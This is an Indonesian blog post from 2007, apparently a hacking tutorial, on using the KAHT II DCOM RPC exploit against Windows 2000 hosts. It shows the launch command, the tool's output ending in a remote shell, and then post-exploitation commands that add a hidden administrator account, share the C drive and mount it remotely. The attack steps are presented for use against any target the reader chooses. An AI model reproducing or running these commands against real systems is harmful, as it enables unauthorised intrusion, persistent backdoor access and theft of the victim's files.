Wednesday, November 14, 2007 at 10:20 PM |  



Mungkin udah banyak yang buat artikel ini, tapi masih ada yg sering nanyain di milis. Boleh di bilang saya menggabungkan beberapa refensi dan menambah sedikit jamu.

Yang dimaksud DCOM exploit disini adalah kaht,Langkah pertama yaitu download program kaht ii terlebih dahulu (search pakek google) letakkan di directory sesuai dengan keinginan anda, biasanya bentuk file dalam Zip coba extract file tersebut setelah ter exstrack kaht bisa digunakan.

Selanjutnya tentukan alamat ip target misal : 192.168.0.12
selanjutnya : Kaht 192.168.0.11 192.168.0.12
keterangan :
192.168.0.11 adalah IP (komputer tagret) awal
192.168.1.12 adalak IP (komputer target) akhir

karena disinia kita akan mengexploitasi ip 192.168.0.12 kita gunakan
kaht 192.168.0.11 192.168.0.12 karena ip 192.168.0.11 merupakan range

terkecil agar exploitasi berjalan lebih cepat sesuai dengan target kita.
Jika komputer target berhasil di exploitasi maka akan muncul akan
muncul tampilan kurang lebih sebagai berikut :

------------------------------------------------------------------------

KAHT II - MASSIVE RPC EXPLOIT

DCOM RPC exploit, Modified by http://us.f406.mail.yahoo.com/ym/Compose?To=At4r@wdesign.es&YY=91376&order=down&sort=date&pos=0

#haxorxitos && #localhost @efnet Ownz you!!!

Full VERSION :) AUTOHACKING

-------------------------------------------------------------------------

[+] Targets : 192.168.0.11-192.168.0.12 eith 50 Threads
[+] Attacking Port. Remote Shell At ports: 36388
[+] Scan in Progress....
- Connecting to 192.168.0.12
Sending Exploit to a [win2k] Server....
- Connectando con la shell REmote...
Microsoft Windows 2000 [VErsion 5.00.2195]
Copyright 1985-2000 Microsoft Corp.

c:\WINNT\system32>

Sampai disini kita sudah berhasil masuk ke komputer target dan kita

berada di directory kerja c:\WINNT\system32>

Sampai disini terserah anda mau malkukan apapun, sesuai keinginan anda disini kita akan coba malakuakn sharing file dan membuka file sharingan tersebut di komputer kita dengan terlebih dahulu menambahkan user ID setingkat administrator.

Untuk melakukan penambahan user di pc Target

C:WINNTsystem32>net user paluared suck /add

^ ^

nama_user password_user

net user paluared suck /add

The command completed successfully.


ket : disini kita menggunakan perintah net user nama_user password_user

/add berdasarkan perintah diatas kita menambahkan user paluared dengan

password suck, setelah user berhasil dibuat selanjutnya kita memberikan

autority pada user paluared dalam groups administrator

C:\WINNT\system32>net localgroup Administrators paluared /add

^ ^

nama_group nama_user

net localgroup Administrators paluared /add

The command completed successfully.



ket : di atas kita menggunakan perinta net localgroup Nama_gorups

nama_user /add berdasarkan perintah diatas net localgroup berarti kita

menambahkan user paluared kedalam groups daministrator pada kumputer local (komputer target), administrators adalah grups dari administrator tersebut dan untuk paluared adalah nama user yg ditambahkan dalam gruop administrator.

setelah masuk coba lo buat user gruops administrator

C:WINNTsystem32>net user paluared such /add

^ ^

user password


setelah itu masukan user paluared ke gruops administrator


C:WINNTsystem32>net localgroup Administrators paluared /add


setelah itu sharing drive-nya


C:WINNTsystem32>net share c=c:


catatan user id nya terserah lo kasih apa sesuai keinginana lo..

oh ya


untuk menggunakan sharing drive tersebut bisa gunakan perintah net use pertama buka dos promt baru di komputer kita

selanjutnya ketik berikut:


c:> net use * \\ip_address\drive_c * /u:paluared

Type the password for \\ip_addres\C: <--- masukan password disini ket : berdasarkan perintah diatas IP_address adalh IP komputer target dan drive_c adalah nama sharing drive dari komputer taget dan untuk u:/paluared bahwa kita masuk dengan menggunakan user paluared (biasanya di dalam winxp/win2000 terdapat sharing defaultnya yaitu C$, d$ dst, jika ini sang admin belum merubah hal tersebut kita dapat langsung melakukan net use atau tanpa malukan net share berdasarkan default sharing ini ) cat IP-Addres bisa juga di isi dengan nama computer untuk keterangan nya lo bisa baca manualnya net use /? setelah berhasil bisa liat di windows explorer C:\WINNT\system32>net share drive_c=c: ^ ^

nama_sharing drive_sharing

net share Drive_c=c:c was shared successfully.


ket : berdasarkan perintah diatas kita melakukan telah sharing drive

yaitu drive C dengan memberikan nama drive_C

Reference:

thanks GOD
Posted by admin Labels:

0 comments:

Visit the Site
Privacy Statement
Copyright 2007, pirate-unsecure